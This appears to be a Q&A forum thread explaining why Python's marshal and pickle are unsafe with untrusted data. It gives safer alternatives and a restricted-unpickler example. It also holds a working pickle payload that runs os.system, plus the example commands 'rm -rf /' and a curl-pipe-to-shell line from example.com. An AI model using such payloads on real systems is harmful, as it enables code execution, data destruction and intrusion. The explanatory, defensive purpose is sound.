I work on a project where I use cPickle to load files quickly. A couple of days ago I read that marshal can be even faster than cPickle. It works for me, but I'm curious, what is this warning from the documentation about:
Warning
The marshal module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.
What exactly could happen if I'm not careful?
There are no known ways to exploit marshal. Actually executing code when using marshal.loads() is not something I was able to do, and looking at the marshal.c source code, I don't see an immediately obvious way.
So why is this warning here? The BDFL explains:
BTW the warning for marshal is legit -- the C code that unpacks marshal data has not been carefully analyzed against buffer overflows and so on. Remember the first time someone broke into a system through a malicious JPEG? The same could happen with marshal. Seriously.
I recommend you read the rest of the discussion; a bug is shown where unmarshaling data causes Python to segfault; this has been fixed since Python 2.5 (this bug could, potentially, be abused to execute code). Other bugs may still exist, though!
Furthermore, the marshal docs mention:
This is not a general “persistence” module. [..] The marshal module exists mainly to support reading and writing the “pseudo-compiled” code for Python modules of .pyc files.
So it's not even designed to persist data in a reliable way.
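A minimal sketch of what that limitation looks like in practice, assuming a hypothetical user-defined Point class: marshal round-trips the built-in types that can show up in compiled code, but raises ValueError for anything else. The marshal docs also say the format may change between Python versions, which is another reason not to treat it as a storage format.

```python
import marshal

# Built-in types that can appear in compiled code round-trip fine.
data = {"name": "example", "values": [1, 2.5, None, True]}
restored = marshal.loads(marshal.dumps(data))


class Point:  # hypothetical user-defined class, for illustration only
    def __init__(self, x, y):
        self.x, self.y = x, y


def try_marshal(obj):
    """Return the marshalled bytes, or None if marshal rejects the object."""
    try:
        return marshal.dumps(obj)
    except ValueError:  # raised for unsupported ("unmarshallable") types
        return None


point_blob = try_marshal(Point(1, 2))
print(restored == data, point_blob)
```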
You can easily execute arbitrary code with pickle. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
0
This was a harmless ls /, but could also be a less harmless rm -rf /, or a curl http://example.com/hack.sh | sh.
You can see how this works by using the pickletools module:
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
Most of it is self-explanatory; with GLOBAL you can get any function, and with REDUCE you call it.
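As a rough sketch, you can also look for these opcodes yourself with pickletools.genops(), which walks the opcode stream without executing anything. The set of "suspicious" opcode names below is my own illustrative choice, not an authoritative list, and a scan like this is not a security boundary; it only makes the GLOBAL/REDUCE pattern from the ls / example visible.

```python
import pickletools

# The payload from the ls / example; it is only inspected here, never loaded.
payload = b"cos\nsystem\n(S'ls /'\ntR."

# Opcodes that look up a global or call a callable. This set is an
# illustrative assumption, not an exhaustive or official list.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "REDUCE"}


def suspicious_opcodes(data):
    """Return (position, opcode name, argument) for each flagged opcode."""
    return [
        (pos, opcode.name, arg)
        for opcode, arg, pos in pickletools.genops(data)
        if opcode.name in SUSPICIOUS
    ]


findings = suspicious_opcodes(payload)
for pos, name, arg in findings:
    print(pos, name, arg)
```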
Since Python is pretty dynamic, you can also use this to monkey-patch a program at run time. For example, you could replace the check_password function with one that uploads the password to a server.
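A harmless sketch of that kind of run-time patching, under a few assumptions: auth_demo is a made-up stand-in module created on the fly, and the replacement is just the built-in bool (so every non-empty password "passes") rather than anything that talks to a server. The point is only that loading the pickle is enough to swap the function.

```python
import importlib
import pickle
import sys
import types

# Hypothetical application module with a password check, registered so that
# it can be imported by name like a real module.
auth = types.ModuleType("auth_demo")
auth.check_password = lambda password: password == "correct horse"
sys.modules["auth_demo"] = auth


class _ModuleRef:
    """Unpickles to the already-imported auth_demo module."""

    def __reduce__(self):
        return (importlib.import_module, ("auth_demo",))


class Patch:
    """Unpickles by calling setattr(auth_demo, "check_password", bool)."""

    def __reduce__(self):
        return (setattr, (_ModuleRef(), "check_password", bool))


blob = pickle.dumps(Patch())

before = auth.check_password("wrong")  # the real check rejects this
pickle.loads(blob)                     # loading alone performs the patch
after = auth.check_password("wrong")   # now bool("wrong"), which is truthy
print(before, after)
```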
Alternatives include XML, JSON, MessagePack, ini files, or perhaps something else. Which format is best depends on your situation.
Has this code been "carefully analyzed against buffer overflows and so on"? Who knows. Most code hasn't, and C makes it easy to do things wrong.1 Even Python code may be vulnerable, as it may call functions implemented in C that are vulnerable.
There have been problems with Python's JSON module. But at the same time, it's used a lot in public-facing apps, so it's probably safe. It'll certainly be safer than marshal, since this was only designed for .pyc files and explicitly comes with a "not audited!" warning.
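For comparison, a small sketch of the same load/save job with the json module (the record contents and the safe_parse helper are made up for illustration). Parsing only ever produces dicts, lists, strings, numbers, booleans and None, and input that isn't JSON is rejected with an exception instead of being interpreted.

```python
import json

# Hypothetical record, for illustration only.
record = {"user": "alice", "scores": [1, 2.5], "active": True, "note": None}

text = json.dumps(record)
loaded = json.loads(text)


def safe_parse(text):
    """Return the parsed value, or None when the input is not valid JSON.

    Note that a literal JSON null also parses to None; a real application
    might prefer to let the exception propagate instead.
    """
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return None


# The pickle payload from earlier is simply rejected as invalid JSON.
bad = safe_parse("cos\nsystem\n(S'ls /'\ntR.")
print(loaded == record, bad)
```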
This is of course no guarantee. Remember that YAML security hole a few years back that caused every Ruby on Rails application in the world to be vulnerable to arbitrary code execution? Oops! And this wasn't even a subtle buffer overflow, but a much more obvious problem.
Note that you should not use yaml's load() method, as this has the same problems as Ruby's YAML. Use safe_load() instead.
The warning in the pickle module is very much warranted (it should probably be stated more strongly), while the warning above the marshal module seems to be more of a "this code was not designed with security in mind"-type of warning, but actually exploiting it is not as easy, and relies on the hypothetical existence of unknown bugs. Still, you're probably better off using something else.
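If you're stuck with pickle anyway, the pickle docs describe restricting which globals may be loaded by overriding Unpickler.find_class(). A minimal sketch along those lines follows; the allow-list is an arbitrary illustration, and this narrows the attack surface rather than making untrusted pickles safe.

```python
import builtins
import io
import pickle

# Illustrative allow-list; a real application would choose its own.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow-listed names from builtins may be resolved.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    """Like pickle.loads(), but refuses any global outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# The os.system payload from earlier is refused before anything is called.
blocked = False
try:
    restricted_loads(b"cos\nsystem\n(S'ls /'\ntR.")
except pickle.UnpicklingError:
    blocked = True

# Plain containers need no globals at all, so they still load.
plain = restricted_loads(pickle.dumps([1, "two", {"three": 3.0}]))
print(blocked, plain)
```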
1 There really ought to be a "carefully analyzed against buffer overflows and so on" seal of trust for open source projects. Yeah, you can shell out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the Core Infrastructure Initiative, but its scope and budget are fairly limited (but it's fairly young, and may gain traction in a few years).